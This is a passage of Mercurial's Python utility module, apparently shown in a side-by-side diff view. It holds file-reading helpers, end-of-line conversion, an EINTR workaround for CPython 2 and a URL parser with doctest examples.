2407
2407
2408 return ''.join(buf)
2408 return ''.join(buf)
2409
2409
2410 def filechunkiter(f, size=131072, limit=None):
2410 def filechunkiter(f, size=131072, limit=None):
2411 """Create a generator that produces the data in the file size
2411 """Create a generator that produces the data in the file size
2412 (default 131072) bytes at a time, up to optional limit (default is
2412 (default 131072) bytes at a time, up to optional limit (default is
2413 to read all data). Chunks may be less than size bytes if the
2413 to read all data). Chunks may be less than size bytes if the
2414 chunk is the last chunk in the file, or the file is a socket or
2414 chunk is the last chunk in the file, or the file is a socket or
2415 some other type of file that sometimes reads less data than is
2415 some other type of file that sometimes reads less data than is
2416 requested."""
2416 requested."""
2417 assert size >= 0
2417 assert size >= 0
2418 assert limit is None or limit >= 0
2418 assert limit is None or limit >= 0
2419 while True:
2419 while True:
2420 if limit is None:
2420 if limit is None:
2421 nbytes = size
2421 nbytes = size
2422 else:
2422 else:
2423 nbytes = min(limit, size)
2423 nbytes = min(limit, size)
2424 s = nbytes and f.read(nbytes)
2424 s = nbytes and f.read(nbytes)
2425 if not s:
2425 if not s:
2426 break
2426 break
2427 if limit:
2427 if limit:
2428 limit -= len(s)
2428 limit -= len(s)
2429 yield s
2429 yield s
2430
2430
2431 class cappedreader(object):
2431 class cappedreader(object):
2432 """A file object proxy that allows reading up to N bytes.
2432 """A file object proxy that allows reading up to N bytes.
2433
2433
2434 Given a source file object, instances of this type allow reading up to
2434 Given a source file object, instances of this type allow reading up to
2435 N bytes from that source file object. Attempts to read past the allowed
2435 N bytes from that source file object. Attempts to read past the allowed
2436 limit are treated as EOF.
2436 limit are treated as EOF.
2437
2437
2438 It is assumed that I/O is not performed on the original file object
2438 It is assumed that I/O is not performed on the original file object
2439 in addition to I/O that is performed by this instance. If there is,
2439 in addition to I/O that is performed by this instance. If there is,
2440 state tracking will get out of sync and unexpected results will ensue.
2440 state tracking will get out of sync and unexpected results will ensue.
2441 """
2441 """
2442 def __init__(self, fh, limit):
2442 def __init__(self, fh, limit):
2443 """Allow reading up to <limit> bytes from <fh>."""
2443 """Allow reading up to <limit> bytes from <fh>."""
2444 self._fh = fh
2444 self._fh = fh
2445 self._left = limit
2445 self._left = limit
2446
2446
2447 def read(self, n=-1):
2447 def read(self, n=-1):
2448 if not self._left:
2448 if not self._left:
2449 return b''
2449 return b''
2450
2450
2451 if n < 0:
2451 if n < 0:
2452 n = self._left
2452 n = self._left
2453
2453
2454 data = self._fh.read(min(n, self._left))
2454 data = self._fh.read(min(n, self._left))
2455 self._left -= len(data)
2455 self._left -= len(data)
2456 assert self._left >= 0
2456 assert self._left >= 0
2457
2457
2458 return data
2458 return data
2459
2459
2460 def readinto(self, b):
2460 def readinto(self, b):
2461 res = self.read(len(b))
2461 res = self.read(len(b))
2462 if res is None:
2462 if res is None:
2463 return None
2463 return None
2464
2464
2465 b[0:len(res)] = res
2465 b[0:len(res)] = res
2466 return len(res)
2466 return len(res)
2467
2467
2468 def unitcountfn(*unittable):
2468 def unitcountfn(*unittable):
2469 '''return a function that renders a readable count of some quantity'''
2469 '''return a function that renders a readable count of some quantity'''
2470
2470
2471 def go(count):
2471 def go(count):
2472 for multiplier, divisor, format in unittable:
2472 for multiplier, divisor, format in unittable:
2473 if abs(count) >= divisor * multiplier:
2473 if abs(count) >= divisor * multiplier:
2474 return format % (count / float(divisor))
2474 return format % (count / float(divisor))
2475 return unittable[-1][2] % count
2475 return unittable[-1][2] % count
2476
2476
2477 return go
2477 return go
2478
2478
2479 def processlinerange(fromline, toline):
2479 def processlinerange(fromline, toline):
2480 """Check that linerange <fromline>:<toline> makes sense and return a
2480 """Check that linerange <fromline>:<toline> makes sense and return a
2481 0-based range.
2481 0-based range.
2482
2482
2483 >>> processlinerange(10, 20)
2483 >>> processlinerange(10, 20)
2484 (9, 20)
2484 (9, 20)
2485 >>> processlinerange(2, 1)
2485 >>> processlinerange(2, 1)
2486 Traceback (most recent call last):
2486 Traceback (most recent call last):
2487 ...
2487 ...
2488 ParseError: line range must be positive
2488 ParseError: line range must be positive
2489 >>> processlinerange(0, 5)
2489 >>> processlinerange(0, 5)
2490 Traceback (most recent call last):
2490 Traceback (most recent call last):
2491 ...
2491 ...
2492 ParseError: fromline must be strictly positive
2492 ParseError: fromline must be strictly positive
2493 """
2493 """
2494 if toline - fromline < 0:
2494 if toline - fromline < 0:
2495 raise error.ParseError(_("line range must be positive"))
2495 raise error.ParseError(_("line range must be positive"))
2496 if fromline < 1:
2496 if fromline < 1:
2497 raise error.ParseError(_("fromline must be strictly positive"))
2497 raise error.ParseError(_("fromline must be strictly positive"))
2498 return fromline - 1, toline
2498 return fromline - 1, toline
2499
2499
2500 bytecount = unitcountfn(
2500 bytecount = unitcountfn(
2501 (100, 1 << 30, _('%.0f GB')),
2501 (100, 1 << 30, _('%.0f GB')),
2502 (10, 1 << 30, _('%.1f GB')),
2502 (10, 1 << 30, _('%.1f GB')),
2503 (1, 1 << 30, _('%.2f GB')),
2503 (1, 1 << 30, _('%.2f GB')),
2504 (100, 1 << 20, _('%.0f MB')),
2504 (100, 1 << 20, _('%.0f MB')),
2505 (10, 1 << 20, _('%.1f MB')),
2505 (10, 1 << 20, _('%.1f MB')),
2506 (1, 1 << 20, _('%.2f MB')),
2506 (1, 1 << 20, _('%.2f MB')),
2507 (100, 1 << 10, _('%.0f KB')),
2507 (100, 1 << 10, _('%.0f KB')),
2508 (10, 1 << 10, _('%.1f KB')),
2508 (10, 1 << 10, _('%.1f KB')),
2509 (1, 1 << 10, _('%.2f KB')),
2509 (1, 1 << 10, _('%.2f KB')),
2510 (1, 1, _('%.0f bytes')),
2510 (1, 1, _('%.0f bytes')),
2511 )
2511 )
2512
2512
2513 class transformingwriter(object):
2513 class transformingwriter(object):
2514 """Writable file wrapper to transform data by function"""
2514 """Writable file wrapper to transform data by function"""
2515
2515
2516 def __init__(self, fp, encode):
2516 def __init__(self, fp, encode):
2517 self._fp = fp
2517 self._fp = fp
2518 self._encode = encode
2518 self._encode = encode
2519
2519
2520 def close(self):
2520 def close(self):
2521 self._fp.close()
2521 self._fp.close()
2522
2522
2523 def flush(self):
2523 def flush(self):
2524 self._fp.flush()
2524 self._fp.flush()
2525
2525
2526 def write(self, data):
2526 def write(self, data):
2527 return self._fp.write(self._encode(data))
2527 return self._fp.write(self._encode(data))
2528
2528
2529 # Matches a single EOL which can either be a CRLF where repeated CR
2529 # Matches a single EOL which can either be a CRLF where repeated CR
2530 # are removed or a LF. We do not care about old Macintosh files, so a
2530 # are removed or a LF. We do not care about old Macintosh files, so a
2531 # stray CR is an error.
2531 # stray CR is an error.
2532 _eolre = remod.compile(br'\r*\n')
2532 _eolre = remod.compile(br'\r*\n')
2533
2533
2534 def tolf(s):
2534 def tolf(s):
2535 return _eolre.sub('\n', s)
2535 return _eolre.sub('\n', s)
2536
2536
2537 def tocrlf(s):
2537 def tocrlf(s):
2538 return _eolre.sub('\r\n', s)
2538 return _eolre.sub('\r\n', s)
2539
2539
2540 def _crlfwriter(fp):
2540 def _crlfwriter(fp):
2541 return transformingwriter(fp, tocrlf)
2541 return transformingwriter(fp, tocrlf)
2542
2542
2543 if pycompat.oslinesep == '\r\n':
2543 if pycompat.oslinesep == '\r\n':
2544 tonativeeol = tocrlf
2544 tonativeeol = tocrlf
2545 fromnativeeol = tolf
2545 fromnativeeol = tolf
2546 nativeeolwriter = _crlfwriter
2546 nativeeolwriter = _crlfwriter
2547 else:
2547 else:
2548 tonativeeol = pycompat.identity
2548 tonativeeol = pycompat.identity
2549 fromnativeeol = pycompat.identity
2549 fromnativeeol = pycompat.identity
2550 nativeeolwriter = pycompat.identity
2550 nativeeolwriter = pycompat.identity
2551
2551
2552 if (pyplatform.python_implementation() == 'CPython' and
2552 if (pyplatform.python_implementation() == 'CPython' and
2553 sys.version_info < (3, 0)):
2553 sys.version_info < (3, 0)):
2554 # There is an issue in CPython that some IO methods do not handle EINTR
2554 # There is an issue in CPython that some IO methods do not handle EINTR
2555 # correctly. The following table shows what CPython version (and functions)
2555 # correctly. The following table shows what CPython version (and functions)
2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2557 #
2557 #
2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2559 # --------------------------------------------------
2559 # --------------------------------------------------
2560 # fp.__iter__ | buggy | buggy | okay
2560 # fp.__iter__ | buggy | buggy | okay
2561 # fp.read* | buggy | okay [1] | okay
2561 # fp.read* | buggy | okay [1] | okay
2562 #
2562 #
2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2564 #
2564 #
2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2567 #
2567 #
2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2571 # fp.__iter__ but not other fp.read* methods.
2571 # fp.__iter__ but not other fp.read* methods.
2572 #
2572 #
2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2577 # to minimize the performance impact.
2577 # to minimize the performance impact.
2578 if sys.version_info >= (2, 7, 4):
2578 if sys.version_info >= (2, 7, 4):
2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2580 def _safeiterfile(fp):
2580 def _safeiterfile(fp):
2581 return iter(fp.readline, '')
2581 return iter(fp.readline, '')
2582 else:
2582 else:
2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2584 # note: this may block longer than necessary because of bufsize.
2584 # note: this may block longer than necessary because of bufsize.
2585 def _safeiterfile(fp, bufsize=4096):
2585 def _safeiterfile(fp, bufsize=4096):
2586 fd = fp.fileno()
2586 fd = fp.fileno()
2587 line = ''
2587 line = ''
2588 while True:
2588 while True:
2589 try:
2589 try:
2590 buf = os.read(fd, bufsize)
2590 buf = os.read(fd, bufsize)
2591 except OSError as ex:
2591 except OSError as ex:
2592 # os.read only raises EINTR before any data is read
2592 # os.read only raises EINTR before any data is read
2593 if ex.errno == errno.EINTR:
2593 if ex.errno == errno.EINTR:
2594 continue
2594 continue
2595 else:
2595 else:
2596 raise
2596 raise
2597 line += buf
2597 line += buf
2598 if '\n' in buf:
2598 if '\n' in buf:
2599 splitted = line.splitlines(True)
2599 splitted = line.splitlines(True)
2600 line = ''
2600 line = ''
2601 for l in splitted:
2601 for l in splitted:
2602 if l[-1] == '\n':
2602 if l[-1] == '\n':
2603 yield l
2603 yield l
2604 else:
2604 else:
2605 line = l
2605 line = l
2606 if not buf:
2606 if not buf:
2607 break
2607 break
2608 if line:
2608 if line:
2609 yield line
2609 yield line
2610
2610
2611 def iterfile(fp):
2611 def iterfile(fp):
2612 fastpath = True
2612 fastpath = True
2613 if type(fp) is file:
2613 if type(fp) is file:
2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2615 if fastpath:
2615 if fastpath:
2616 return fp
2616 return fp
2617 else:
2617 else:
2618 return _safeiterfile(fp)
2618 return _safeiterfile(fp)
2619 else:
2619 else:
2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2621 def iterfile(fp):
2621 def iterfile(fp):
2622 return fp
2622 return fp
2623
2623
2624 def iterlines(iterator):
2624 def iterlines(iterator):
2625 for chunk in iterator:
2625 for chunk in iterator:
2626 for line in chunk.splitlines():
2626 for line in chunk.splitlines():
2627 yield line
2627 yield line
2628
2628
2629 def expandpath(path):
2629 def expandpath(path):
2630 return os.path.expanduser(os.path.expandvars(path))
2630 return os.path.expanduser(os.path.expandvars(path))
2631
2631
2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2633 """Return the result of interpolating items in the mapping into string s.
2633 """Return the result of interpolating items in the mapping into string s.
2634
2634
2635 prefix is a single character string, or a two character string with
2635 prefix is a single character string, or a two character string with
2636 a backslash as the first character if the prefix needs to be escaped in
2636 a backslash as the first character if the prefix needs to be escaped in
2637 a regular expression.
2637 a regular expression.
2638
2638
2639 fn is an optional function that will be applied to the replacement text
2639 fn is an optional function that will be applied to the replacement text
2640 just before replacement.
2640 just before replacement.
2641
2641
2642 escape_prefix is an optional flag that allows using doubled prefix for
2642 escape_prefix is an optional flag that allows using doubled prefix for
2643 its escaping.
2643 its escaping.
2644 """
2644 """
2645 fn = fn or (lambda s: s)
2645 fn = fn or (lambda s: s)
2646 patterns = '|'.join(mapping.keys())
2646 patterns = '|'.join(mapping.keys())
2647 if escape_prefix:
2647 if escape_prefix:
2648 patterns += '|' + prefix
2648 patterns += '|' + prefix
2649 if len(prefix) > 1:
2649 if len(prefix) > 1:
2650 prefix_char = prefix[1:]
2650 prefix_char = prefix[1:]
2651 else:
2651 else:
2652 prefix_char = prefix
2652 prefix_char = prefix
2653 mapping[prefix_char] = prefix_char
2653 mapping[prefix_char] = prefix_char
2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2656
2656
2657 def getport(port):
2657 def getport(port):
2658 """Return the port for a given network service.
2658 """Return the port for a given network service.
2659
2659
2660 If port is an integer, it's returned as is. If it's a string, it's
2660 If port is an integer, it's returned as is. If it's a string, it's
2661 looked up using socket.getservbyname(). If there's no matching
2661 looked up using socket.getservbyname(). If there's no matching
2662 service, error.Abort is raised.
2662 service, error.Abort is raised.
2663 """
2663 """
2664 try:
2664 try:
2665 return int(port)
2665 return int(port)
2666 except ValueError:
2666 except ValueError:
2667 pass
2667 pass
2668
2668
2669 try:
2669 try:
2670 return socket.getservbyname(pycompat.sysstr(port))
2670 return socket.getservbyname(pycompat.sysstr(port))
2671 except socket.error:
2671 except socket.error:
2672 raise error.Abort(_("no port number associated with service '%s'")
2672 raise error.Abort(_("no port number associated with service '%s'")
2673 % port)
2673 % port)
2674
2674
2675 class url(object):
2675 class url(object):
2676 r"""Reliable URL parser.
2676 r"""Reliable URL parser.
2677
2677
2678 This parses URLs and provides attributes for the following
2678 This parses URLs and provides attributes for the following
2679 components:
2679 components:
2680
2680
2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2682
2682
2683 Missing components are set to None. The only exception is
2683 Missing components are set to None. The only exception is
2684 fragment, which is set to '' if present but empty.
2684 fragment, which is set to '' if present but empty.
2685
2685
2686 If parsefragment is False, fragment is included in query. If
2686 If parsefragment is False, fragment is included in query. If
2687 parsequery is False, query is included in path. If both are
2687 parsequery is False, query is included in path. If both are
2688 False, both fragment and query are included in path.
2688 False, both fragment and query are included in path.
2689
2689
2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2691
2691
2692 Note that for backward compatibility reasons, bundle URLs do not
2692 Note that for backward compatibility reasons, bundle URLs do not
2693 take host names. That means 'bundle://../' has a path of '../'.
2693 take host names. That means 'bundle://../' has a path of '../'.
2694
2694
2695 Examples:
2695 Examples:
2696
2696
2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2701 >>> url(b'file:///home/joe/repo')
2701 >>> url(b'file:///home/joe/repo')
2702 <url scheme: 'file', path: '/home/joe/repo'>
2702 <url scheme: 'file', path: '/home/joe/repo'>
2703 >>> url(b'file:///c:/temp/foo/')
2703 >>> url(b'file:///c:/temp/foo/')
2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2705 >>> url(b'bundle:foo')
2705 >>> url(b'bundle:foo')
2706 <url scheme: 'bundle', path: 'foo'>
2706 <url scheme: 'bundle', path: 'foo'>
2707 >>> url(b'bundle://../foo')
2707 >>> url(b'bundle://../foo')
2708 <url scheme: 'bundle', path: '../foo'>
2708 <url scheme: 'bundle', path: '../foo'>
2709 >>> url(br'c:\foo\bar')
2709 >>> url(br'c:\foo\bar')
2710 <url path: 'c:\\foo\\bar'>
2710 <url path: 'c:\\foo\\bar'>
2711 >>> url(br'\\blah\blah\blah')
2711 >>> url(br'\\blah\blah\blah')
2712 <url path: '\\\\blah\\blah\\blah'>
2712 <url path: '\\\\blah\\blah\\blah'>
2713 >>> url(br'\\blah\blah\blah#baz')
2713 >>> url(br'\\blah\blah\blah#baz')
2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2715 >>> url(br'file:///C:\users\me')
2715 >>> url(br'file:///C:\users\me')
2716 <url scheme: 'file', path: 'C:\\users\\me'>
2716 <url scheme: 'file', path: 'C:\\users\\me'>
2717
2717
2718 Authentication credentials:
2718 Authentication credentials:
2719
2719
2720 >>> url(b'ssh://joe:xyz@x/repo')
2720 >>> url(b'ssh://joe:xyz@x/repo')
2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2722 >>> url(b'ssh://joe@x/repo')
2722 >>> url(b'ssh://joe@x/repo')
2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2724
2724
2725 Query strings and fragments:
2725 Query strings and fragments:
2726
2726
2727 >>> url(b'http://host/a?b#c')
2727 >>> url(b'http://host/a?b#c')
2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2731
2731
2732 Empty path:
2732 Empty path:
2733
2733
2734 >>> url(b'')
2734 >>> url(b'')
2735 <url path: ''>
2735 <url path: ''>
2736 >>> url(b'#a')
2736 >>> url(b'#a')
2737 <url path: '', fragment: 'a'>
2737 <url path: '', fragment: 'a'>
2738 >>> url(b'http://host/')
2738 >>> url(b'http://host/')
2739 <url scheme: 'http', host: 'host', path: ''>
2739 <url scheme: 'http', host: 'host', path: ''>
2740 >>> url(b'http://host/#a')
2740 >>> url(b'http://host/#a')
2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2742
2742
2743 Only scheme:
2743 Only scheme:
2744
2744
2745 >>> url(b'http:')
2745 >>> url(b'http:')
2746 <url scheme: 'http'>
2746 <url scheme: 'http'>
2747 """
2747 """
2748
2748
2749 _safechars = "!~*'()+"
2749 _safechars = "!~*'()+"
2750 _safepchars = "/!~*'()+:\\"
2750 _safepchars = "/!~*'()+:\\"
2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2752
2752
2753 def __init__(self, path, parsequery=True, parsefragment=True):
2753 def __init__(self, path, parsequery=True, parsefragment=True):
2754 # We slowly chomp away at path until we have only the path left
2754 # We slowly chomp away at path until we have only the path left
2755 self.scheme = self.user = self.passwd = self.host = None
2755 self.scheme = self.user = self.passwd = self.host = None
2756 self.port = self.path = self.query = self.fragment = None
2756 self.port = self.path = self.query = self.fragment = None
2757 self._localpath = True
2757 self._localpath = True
2758 self._hostport = ''
2758 self._hostport = ''
2759 self._origpath = path
2759 self._origpath = path
2760
2760
2761 if parsefragment and '#' in path:
2761 if parsefragment and '#' in path:
2762 path, self.fragment = path.split('#', 1)
2762 path, self.fragment = path.split('#', 1)
2763
2763
2764 # special case for Windows drive letters and UNC paths
2764 # special case for Windows drive letters and UNC paths
2765 if hasdriveletter(path) or path.startswith('\\\\'):
2765 if hasdriveletter(path) or path.startswith('\\\\'):
2766 self.path = path
2766 self.path = path
2767 return
2767 return
2768
2768
2769 # For compatibility reasons, we can't handle bundle paths as
2769 # For compatibility reasons, we can't handle bundle paths as
2770 # normal URLS
2770 # normal URLS
2771 if path.startswith('bundle:'):
2771 if path.startswith('bundle:'):
2772 self.scheme = 'bundle'
2772 self.scheme = 'bundle'
2773 path = path[7:]
2773 path = path[7:]
2774 if path.startswith('//'):
2774 if path.startswith('//'):
2775 path = path[2:]
2775 path = path[2:]
2776 self.path = path
2776 self.path = path
2777 return
2777 return
2778
2778
2779 if self._matchscheme(path):
2779 if self._matchscheme(path):
2780 parts = path.split(':', 1)
2780 parts = path.split(':', 1)
2781 if parts[0]:
2781 if parts[0]:
2782 self.scheme, path = parts
2782 self.scheme, path = parts
2783 self._localpath = False
2783 self._localpath = False
2784
2784
2785 if not path:
2785 if not path:
2786 path = None
2786 path = None
2787 if self._localpath:
2787 if self._localpath:
2788 self.path = ''
2788 self.path = ''
2789 return
2789 return
2790 else:
2790 else:
2791 if self._localpath:
2791 if self._localpath:
2792 self.path = path
2792 self.path = path
2793 return
2793 return
2794
2794
2795 if parsequery and '?' in path:
2795 if parsequery and '?' in path:
2796 path, self.query = path.split('?', 1)
2796 path, self.query = path.split('?', 1)
2797 if not path:
2797 if not path:
2798 path = None
2798 path = None
2799 if not self.query:
2799 if not self.query:
2800 self.query = None
2800 self.query = None
2801
2801
2802 # // is required to specify a host/authority
2802 # // is required to specify a host/authority
2803 if path and path.startswith('//'):
2803 if path and path.startswith('//'):
2804 parts = path[2:].split('/', 1)
2804 parts = path[2:].split('/', 1)
2805 if len(parts) > 1:
2805 if len(parts) > 1:
2806 self.host, path = parts
2806 self.host, path = parts
2807 else:
2807 else:
2808 self.host = parts[0]
2808 self.host = parts[0]
2809 path = None
2809 path = None
2810 if not self.host:
2810 if not self.host:
2811 self.host = None
2811 self.host = None
2812 # path of file:///d is /d
2812 # path of file:///d is /d
2813 # path of file:///d:/ is d:/, not /d:/
2813 # path of file:///d:/ is d:/, not /d:/
2814 if path and not hasdriveletter(path):
2814 if path and not hasdriveletter(path):
2815 path = '/' + path
2815 path = '/' + path
2816
2816
2817 if self.host and '@' in self.host:
2817 if self.host and '@' in self.host:
2818 self.user, self.host = self.host.rsplit('@', 1)
2818 self.user, self.host = self.host.rsplit('@', 1)
2819 if ':' in self.user:
2819 if ':' in self.user:
2820 self.user, self.passwd = self.user.split(':', 1)
2820 self.user, self.passwd = self.user.split(':', 1)
2821 if not self.host:
2821 if not self.host:
2822 self.host = None
2822 self.host = None
2823
2823
2824 # Don't split on colons in IPv6 addresses without ports
2824 # Don't split on colons in IPv6 addresses without ports
2825 if (self.host and ':' in self.host and
2825 if (self.host and ':' in self.host and
2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2827 self._hostport = self.host
2827 self._hostport = self.host
2828 self.host, self.port = self.host.rsplit(':', 1)
2828 self.host, self.port = self.host.rsplit(':', 1)
2829 if not self.host:
2829 if not self.host:
2830 self.host = None
2830 self.host = None
2831
2831
2832 if (self.host and self.scheme == 'file' and
2832 if (self.host and self.scheme == 'file' and
2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2835
2835
2836 self.path = path
2836 self.path = path
2837
2837
2838 # leave the query string escaped
2838 # leave the query string escaped
2839 for a in ('user', 'passwd', 'host', 'port',
2839 for a in ('user', 'passwd', 'host', 'port',
2840 'path', 'fragment'):
2840 'path', 'fragment'):
2841 v = getattr(self, a)
2841 v = getattr(self, a)
2842 if v is not None:
2842 if v is not None:
2843 setattr(self, a, urlreq.unquote(v))
2843 setattr(self, a, urlreq.unquote(v))
2844
2844
2845 @encoding.strmethod
2845 @encoding.strmethod
2846 def __repr__(self):
2846 def __repr__(self):
2847 attrs = []
2847 attrs = []
2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2849 'query', 'fragment'):
2849 'query', 'fragment'):
2850 v = getattr(self, a)
2850 v = getattr(self, a)
2851 if v is not None:
2851 if v is not None:
2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2853 return '<url %s>' % ', '.join(attrs)
2853 return '<url %s>' % ', '.join(attrs)
2854
2854
2855 def __bytes__(self):
2855 def __bytes__(self):
2856 r"""Join the URL's components back into a URL string.
2856 r"""Join the URL's components back into a URL string.
2857
2857
2858 Examples:
2858 Examples:
2859
2859
2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2863 'http://user:pw@host:80/?foo=bar&baz=42'
2863 'http://user:pw@host:80/?foo=bar&baz=42'
2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2867 'ssh://user:pw@[::1]:2200//home/joe#'
2867 'ssh://user:pw@[::1]:2200//home/joe#'
2868 >>> bytes(url(b'http://localhost:80//'))
2868 >>> bytes(url(b'http://localhost:80//'))
2869 'http://localhost:80//'
2869 'http://localhost:80//'
2870 >>> bytes(url(b'http://localhost:80/'))
2870 >>> bytes(url(b'http://localhost:80/'))
2871 'http://localhost:80/'
2871 'http://localhost:80/'
2872 >>> bytes(url(b'http://localhost:80'))
2872 >>> bytes(url(b'http://localhost:80'))
2873 'http://localhost:80/'
2873 'http://localhost:80/'
2874 >>> bytes(url(b'bundle:foo'))
2874 >>> bytes(url(b'bundle:foo'))
2875 'bundle:foo'
2875 'bundle:foo'
2876 >>> bytes(url(b'bundle://../foo'))
2876 >>> bytes(url(b'bundle://../foo'))
2877 'bundle:../foo'
2877 'bundle:../foo'
2878 >>> bytes(url(b'path'))
2878 >>> bytes(url(b'path'))
2879 'path'
2879 'path'
2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2881 'file:///tmp/foo/bar'
2881 'file:///tmp/foo/bar'
2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2883 'file:///c:/tmp/foo/bar'
2883 'file:///c:/tmp/foo/bar'
2884 >>> print(url(br'bundle:foo\bar'))
2884 >>> print(url(br'bundle:foo\bar'))
2885 bundle:foo\bar
2885 bundle:foo\bar
2886 >>> print(url(br'file:///D:\data\hg'))
2886 >>> print(url(br'file:///D:\data\hg'))
2887 file:///D:\data\hg
2887 file:///D:\data\hg
2888 """
2888 """
2889 if self._localpath:
2889 if self._localpath:
2890 s = self.path
2890 s = self.path
2891 if self.scheme == 'bundle':
2891 if self.scheme == 'bundle':
2892 s = 'bundle:' + s
2892 s = 'bundle:' + s
2893 if self.fragment:
2893 if self.fragment:
2894 s += '#' + self.fragment
2894 s += '#' + self.fragment
2895 return s
2895 return s
2896
2896
2897 s = self.scheme + ':'
2897 s = self.scheme + ':'
2898 if self.user or self.passwd or self.host:
2898 if self.user or self.passwd or self.host:
2899 s += '//'
